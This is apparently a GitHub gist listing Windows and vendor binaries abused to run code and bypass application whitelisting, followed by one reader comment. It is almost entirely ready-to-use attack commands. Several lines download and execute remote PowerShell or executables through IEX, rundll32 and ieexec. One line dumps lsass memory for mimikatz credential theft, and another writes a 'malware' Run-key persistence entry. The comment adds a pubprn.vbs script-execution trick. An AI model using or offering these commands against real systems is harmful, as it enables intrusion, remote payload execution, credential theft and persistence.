forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe or hh.exe c:\
certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't exec. download only
regsvr32 /s /n /u /i: scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dump lsass to mimikatz comp. dump
sqldumper.exe 540 0 0x01100
pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
winword /l dllfile.dll
InfDefaultInstall.exe shady.inf
sqldumper 540 0 0x01100
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat
Powershell host
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
print /D:c:\ads\file.exe \\\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
*** Non-MS binaries ***
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
symerr.exe ("cclib.dll" in same directory) -
SynTPEnh.exe /SHELLEXEC somebinary.exe -
GfxDownloadWrapper.exe "" "C:\Temp\harmless.exe" -
RunCmd_x64.exe C:\windows\system32\calc.exe
plexscripthost.exe #Pythonscript engine

fsacer commented Nov 11, 2017

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:"
